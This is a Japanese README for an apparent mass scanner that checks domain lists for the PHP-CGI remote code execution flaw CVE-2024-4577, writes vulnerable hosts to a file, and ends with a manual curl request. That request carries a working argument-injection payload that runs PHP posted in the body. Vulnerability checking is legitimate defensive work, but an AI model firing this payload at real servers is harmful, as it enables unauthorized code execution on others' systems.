
このスクリプトは、CVE-2024-4577 で説明されている脆弱性をチェックするために設計されています。これは、特定の PHP 設定を悪用してリモートで任意のコードを実行するものです。ドメインリスト内の指定されたエンドポイントに POST リクエストを送信し、レスポンスが脆弱性を示しているかどうかを確認します。
GNU Parallel をインストールします:
sudo apt-get install parallel
リポジトリをクローン: Git を使用して、このリポジトリをローカルマシンにクローンします:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
リポジトリへ移動: クローンしたディレクトリに移動します:
cd CVE-2024-4577
ドメインリストを準備: チェックするドメインのリストを含むテキストファイルを作成します。各ドメインは新しい行に配置してください。例:
https://example1.com
https://example2.com
https://example3.com
スクリプトを実行:
スクリプト CVE-2024-4577.sh を、ドメインリストファイルのパスを引数として渡して実行します:
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
出力を確認:
スクリプトは各ドメインをチェックする際に進行状況を表示します。ドメインが脆弱であると検出された場合、赤色でハイライト表示されます。また、スクリプトは脆弱なドメインのリストを vulnerable_domains.txt というファイルにエクスポートします。
vulnerable_domains.txtスクリプトは、脆弱なドメインのリストを vulnerable_domains.txt というファイルにエクスポートします。このファイルには、脆弱なドメインの単純なリストが含まれており、各ドメインは新しい行に記載されます。手動でさらに確認するには、curl コマンドを使用して、ドメイン上のターゲットエンドポイントに POST リクエストを送信します。https://dev.example.com/test.php をターゲットドメイン上の実際のエンドポイントに置き換えてください。
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"